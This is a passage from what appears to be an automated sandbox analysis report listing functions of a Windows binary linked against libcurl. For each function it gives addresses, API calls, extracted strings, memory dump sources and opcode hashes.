    • Opcode Fuzzy Hash: 591f7c1c02efc227cea993d8ce6bfdcf5ddca1c6cd4ecf8456c44c8a9d2e7ff8
    • Instruction Fuzzy Hash: 732160B1E00208AFDF40EF98D951BAE7BBAAF44305F14806DF508EB342E6759B408B94
    Function 00666AB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen
    • String ID: WinIDN$libcurl/7.67.1-DEV
    • API String ID: 4218353326-3761753348
    • Opcode ID: 35f422c95bf07cfede5a641a59dd38d21f48e16e8b30fb2fb857ac169ea6a5b0
    • Instruction ID: da02df6c216087ce094d911ada8efb00a4e037dd8766d87b8ed02ddee102cd41
    • Opcode Fuzzy Hash: 35f422c95bf07cfede5a641a59dd38d21f48e16e8b30fb2fb857ac169ea6a5b0
    • Instruction Fuzzy Hash: E631F2B5E00248FFCB00DFE9D981A9DBBB6EF44304F2081A8E408B7341E635AB50DB49
    Function 00687720 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006877CE
      • Part of subcall function 006BF9C0: _RTC_StackFailure.LIBCMT ref: 006BF9FD
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Stack$CheckFailureVars@8
    • String ID: 'eh$'eh
    • API String ID: 3742378178-800875661
    • Opcode ID: e0ff29da29428300c924bb312f3c47643f7a711f83c0eaa147de5d4eb8c13c65
    • Instruction ID: 481010c57db0f333eb0a27c328a16eb992bf2e6a7f28623e03c07e1681a0f06c
    • Opcode Fuzzy Hash: e0ff29da29428300c924bb312f3c47643f7a711f83c0eaa147de5d4eb8c13c65
    • Instruction Fuzzy Hash: B9215174A00208AFDB04DF98D851BEEB7B6EF88300F10816DE815AB391E6719A41CB95
    Function 00660A1F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00660BAD
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661F74
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661FCC
      • Part of subcall function 00661F00: @_RTC_CheckStackVars@8.LIBCMT ref: 00661FFA
    Strings
    • NTLM-proxy picked AND auth done set, clear picked!, xrefs: 00660AA5
    • NTLM picked AND auth done set, clear picked!, xrefs: 00660A61
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8_strlen
    • String ID: NTLM picked AND auth done set, clear picked!$NTLM-proxy picked AND auth done set, clear picked!
    • API String ID: 1951014933-1655875973
    • Opcode ID: fbd0a70a39b1a94780c5d5493f4df1ca08d934ad84365c381ca8c96000110b27
    • Instruction ID: 1f8ee2d69a513b1d00b3651715119b968b2bb194ec9ae32e33786b0174b0631c
    • Opcode Fuzzy Hash: fbd0a70a39b1a94780c5d5493f4df1ca08d934ad84365c381ca8c96000110b27
    • Instruction Fuzzy Hash: C821A475600204EBDB04DF94D895BEE3B76AB85385F18807EF84C4F342D636AA81CBE1
    Function 00696FF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 006B51C0: @_RTC_CheckStackVars@8.LIBCMT ref: 006B59A8
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00697098
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: Authentication cancelled$C
    • API String ID: 930174750-2942935573
    • Opcode ID: 31d558bb3a2a32e63c8187518a31e88f1ff429d0e0e81c22bf3dbd0d12c5a5cd
    • Instruction ID: 5919667f4e5357bacaae908b1cf95e22ce38563ead19f3f056b30d448c5048f5
    • Opcode Fuzzy Hash: 31d558bb3a2a32e63c8187518a31e88f1ff429d0e0e81c22bf3dbd0d12c5a5cd
    • Instruction Fuzzy Hash: 072129B5D04208EFCF40DF98D851BEEBBBAAB48304F10816AE408AB341E2359B41CF95
    Function 0069F7DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0069F99D
      • Part of subcall function 00662050: _strlen.LIBCMT ref: 006620BD
      • Part of subcall function 00662050: @_RTC_CheckStackVars@8.LIBCMT ref: 0066217B
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8$_strlen
    • String ID: CWD %s$Failed to MKD dir: %03d
    • API String ID: 572576967-2878729461
    • Opcode ID: eaab4c77ac7573b273e048d0d3d7f06bc0698088329b7ad25fa8d71849f1f363
    • Instruction ID: 66461a44b4b1d16ffed2388c1e12e0b65872c243fe6937ff88ff7afc640a03a1
    • Opcode Fuzzy Hash: eaab4c77ac7573b273e048d0d3d7f06bc0698088329b7ad25fa8d71849f1f363
    • Instruction Fuzzy Hash: 961181B5E00109EFDF44DF98D985AFEB37AEB84304F21816AE805DB341D635AE42DB91
    Function 0068D260 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55COMMON
    Download Yara Rule
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID:
    • String ID: `+p$tftp_send_first: internal error
    • API String ID: 0-972452009
    • Opcode ID: 6dd870dc2bd33f41f060962a25abd9d6fc68dc47b338218377e3fddd7f20e1b1
    • Instruction ID: b936fc55fdb699d4aeb0d400ab0820d45fe75d433f65fbfbe0647089969ff181
    • Opcode Fuzzy Hash: 6dd870dc2bd33f41f060962a25abd9d6fc68dc47b338218377e3fddd7f20e1b1
    • Instruction Fuzzy Hash: 6A1193B5A00208DFCB04DF58D851ADDB7B5FF49310F0081A9E8486B391D7759A84CFA4
    Function 006822F9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53encryptionCOMMON
    Download Yara Rule
    APIs
    • CertFreeCertificateContext.CRYPT32(00000000), ref: 00682408
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00682436
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CertCertificateCheckContextFreeStackVars@8
    • String ID: U'h$schannel: failed to retrieve remote cert context
    • API String ID: 833836643-2018148088
    • Opcode ID: a69cf1a68b6ac47e83566161f6738fa8ac9b6adf66acf60579344e873a545838
    • Instruction ID: b3f57f998f0589c265eb502c53744073d90b87ee9cc793ae2eb1a6ebbd608a23
    • Opcode Fuzzy Hash: a69cf1a68b6ac47e83566161f6738fa8ac9b6adf66acf60579344e873a545838
    • Instruction Fuzzy Hash: C11165B5E041199FDB50FB94EC61BFE73BAEB84304F10C269E809AB341DA355A45CBA1
    Function 006B9B30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen_strpbrk
    • String ID: \/@
    • API String ID: 1970528640-4263999291
    • Opcode ID: 8f8dc14c7b4031755f89759a22e2393f596af551fdd09b4a660b39fbfa31923f
    • Instruction ID: c840cf95c4f77b2cd3587b5b65e2a058dce4b2ed197ef1895445357696fd018b
    • Opcode Fuzzy Hash: 8f8dc14c7b4031755f89759a22e2393f596af551fdd09b4a660b39fbfa31923f
    • Instruction Fuzzy Hash: 0B110AB0C0824CEBDF50DFA8D4857EEBFB2AB01308F148499D5596B342D3B596C5CBA1
    Function 006E03D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _free
    • String ID: al%08X$%08X
    • API String ID: 269201875-2095630812
    • Opcode ID: b7621edc596f78a9c8d7b02592b5a251147788285f8440247745596b1766018f
    • Instruction ID: 3d77a5a493571176b0f95ae3eae4f9608237fe3c627da2aa9c7dd4f55278f764
    • Opcode Fuzzy Hash: b7621edc596f78a9c8d7b02592b5a251147788285f8440247745596b1766018f
    • Instruction Fuzzy Hash: A9118C72D02765DFDB209F5A85016A9B3A2EB08B20F15420AEA60673C1C7B4A982CBC5
    Function 006875F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00687665
      • Part of subcall function 006BF9C0: _RTC_StackFailure.LIBCMT ref: 006BF9FD
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Stack$CheckFailureVars@8
    • String ID: Ieh$Ieh
    • API String ID: 3742378178-3061626143
    • Opcode ID: edd26453957b8f3e497e9e8b4a4e40228dfbc35c919340c877bdf48c2adcf7c4
    • Instruction ID: 1f96271a392c10995a8070e6bba1ae866d4446717624f2eb59776c8ba354bac8
    • Opcode Fuzzy Hash: edd26453957b8f3e497e9e8b4a4e40228dfbc35c919340c877bdf48c2adcf7c4
    • Instruction Fuzzy Hash: D31121B1E00208AFCB40EFA8D842BEDBBB9EF49300F10416EE509DB352E6715A40CBD5
    Function 006E0066 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
    Download Yara Rule
    APIs
    • GetOEMCP.KERNEL32(00000000,006E02D8,?,al%08X,?,?,006C610D,58383025,00000000), ref: 006E0091
    • GetACP.KERNEL32(00000000,006E02D8,?,al%08X,?,?,006C610D,58383025,00000000), ref: 006E00A8
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID:
    • String ID: al%08X
    • API String ID: 0-2725849004
    • Opcode ID: c4f695d8ac6bd81cedfbb87418088cc1792933649b30e81f01a061102a18b7e7
    • Instruction ID: ab20b9fd0d8abf9aec02c86b239bd2d4ca529f6e84e487d8bd7551d8b0fbc4a4
    • Opcode Fuzzy Hash: c4f695d8ac6bd81cedfbb87418088cc1792933649b30e81f01a061102a18b7e7
    • Instruction Fuzzy Hash: 4EF04F70411384CFE710DB6AD8887A97772EB4033AF108748E0259B2E1CBBA99C1CF55
    Function 006C109A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00633770: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,006C10C9,?,?,?,0063105A), ref: 00633775
      • Part of subcall function 00633770: GetLastError.KERNEL32(?,?,?,0063105A), ref: 0063377F
    • IsDebuggerPresent.KERNEL32(?,?,?,0063105A), ref: 006C10CD
    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0063105A), ref: 006C10DC
    Strings
    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 006C10D7
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
    • API String ID: 3511171328-631824599
    • Opcode ID: 9d9ca1f717be8d63cd017219e170b186323ce7e2b8f45a5f1241360978e5b3ea
    • Instruction ID: 03aa75647bdc811756930e5a8dd29c4e564b7702430b2a6c7316e91a2d36b4c6
    • Opcode Fuzzy Hash: 9d9ca1f717be8d63cd017219e170b186323ce7e2b8f45a5f1241360978e5b3ea
    • Instruction Fuzzy Hash: 8FE03970201B908FD3609F66D5447527AE6EF02300F04891CE485CA341EFB5D6888BE1